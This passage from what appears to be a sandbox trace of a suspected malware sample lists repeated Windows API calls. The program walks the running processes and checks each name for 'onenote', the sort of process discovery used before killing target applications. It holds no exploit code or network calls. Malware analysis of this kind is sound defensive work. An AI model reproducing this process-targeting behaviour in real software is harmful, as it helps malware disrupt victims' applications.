dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0097.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.995] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579c80 [0097.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3579c80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0097.995] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0097.995] StrStrIA (lpFirst="spoolsv.exe", lpSrch="onenote") returned 0x0 [0097.995] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.997] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579e00 [0097.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579e00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.997] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.997] StrStrIA (lpFirst="svchost.exe", lpSrch="onenote") returned 0x0 [0097.997] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0097.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.998] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579d10 [0097.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x3579d10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0097.998] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0097.998] StrStrIA (lpFirst="audiodg.exe", lpSrch="onenote") returned 0x0 [0097.999] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0098.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.000] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579de8 [0098.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x3579de8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0098.000] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0098.000] StrStrIA (lpFirst="sihost.exe", lpSrch="onenote") returned 0x0 [0098.000] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.001] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579cc8 [0098.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579cc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.001] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.001] StrStrIA (lpFirst="svchost.exe", lpSrch="onenote") returned 0x0 [0098.001] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0098.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.002] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3579c50 [0098.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3579c50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0098.002] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0098.002] StrStrIA (lpFirst="taskhostw.exe", lpSrch="onenote") returned 0x0 [0098.002] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0098.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.004] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579e18 [0098.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3579e18, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0098.004] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0098.004] StrStrIA (lpFirst="explorer.exe", lpSrch="onenote") returned 0x0 [0098.004] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0098.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.005] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357aad8 [0098.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x357aad8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0098.005] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0098.005] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="onenote") returned 0x0 [0098.005] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0098.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0098.006] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356b3c0 [0098.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356b3c0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0098.006] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0098.007] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="onenote") returned 0x0 [0098.007] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0098.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.008] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357aaf8 [0098.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x357aaf8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0098.008] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0098.008] StrStrIA (lpFirst="Memory Compression", lpSrch="onenote") returned 0x0 [0098.008] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0098.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0098.009] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x357ab18 [0098.009] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x357ab18, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0098.009] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0098.009] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="onenote") returned 0x0 [0098.009] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0098.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.011] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579e78 [0098.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3579e78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0098.011] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0098.011] StrStrIA (lpFirst="SearchUI.exe", lpSrch="onenote") returned 0x0 [0098.011] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0098.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0098.012] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357ab38 [0098.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x357ab38, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0098.012] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0098.012] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="onenote") returned 0x0 [0098.012] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0098.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.014] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579dd0 [0098.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3579dd0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0098.014] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0098.014] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="onenote") returned 0x0 [0098.014] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0098.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.016] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579e30 [0098.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3579e30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0098.016] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0098.016] StrStrIA (lpFirst="pending.exe", lpSrch="onenote") returned 0x0 [0098.016] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0098.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0098.017] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356b6b8 [0098.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356b6b8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0098.017] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0098.017] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="onenote") returned 0x0 [0098.018] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0098.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.019] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357b038 [0098.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x357b038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0098.019] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0098.019] StrStrIA (lpFirst="swing prefer.exe", lpSrch="onenote") returned 0x0 [0098.019] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0098.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0098.027] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356b398 [0098.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356b398, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0098.028] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0098.028] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="onenote") returned 0x0 [0098.028] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0098.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.029] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357acd8 [0098.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x357acd8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0098.029] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0098.029] StrStrIA (lpFirst="nights-attending.exe", lpSrch="onenote") returned 0x0 [0098.029] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0098.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.030] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3579da0 [0098.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x3579da0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0098.030] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0098.030] StrStrIA (lpFirst="installed.exe", lpSrch="onenote") returned 0x0 [0098.030] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0098.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0098.031] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356b3e8 [0098.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356b3e8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0098.032] lstrcpyA (in: lpString1=0x567fabc, lpString2="references compounds.exe" | out: lpString1="references compounds.exe") returned="references compounds.exe" [0098.032] StrStrIA (lpFirst="references compounds.exe", lpSrch="onenote") returned 0x0 [0098.032] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="albuquerque_left.exe")) returned 1 [0098.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.033] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357adb8 [0098.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="albuquerque_left.exe", cchWideChar=-1, lpMultiByteStr=0x357adb8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="albuquerque_left.exe", lpUsedDefaultChar=0x0) returned 21 [0098.033] lstrcpyA (in: lpString1=0x567fabc, lpString2="albuquerque_left.exe" | out: lpString1="albuquerque_left.exe") returned="albuquerque_left.exe" [0098.033] StrStrIA (lpFirst="albuquerque_left.exe", lpSrch="onenote") returned 0x0 [0098.033] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="registered try.exe")) returned 1 [0098.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.034] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357afd8 [0098.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="registered try.exe", cchWideChar=-1, lpMultiByteStr=0x357afd8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0098.034] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" 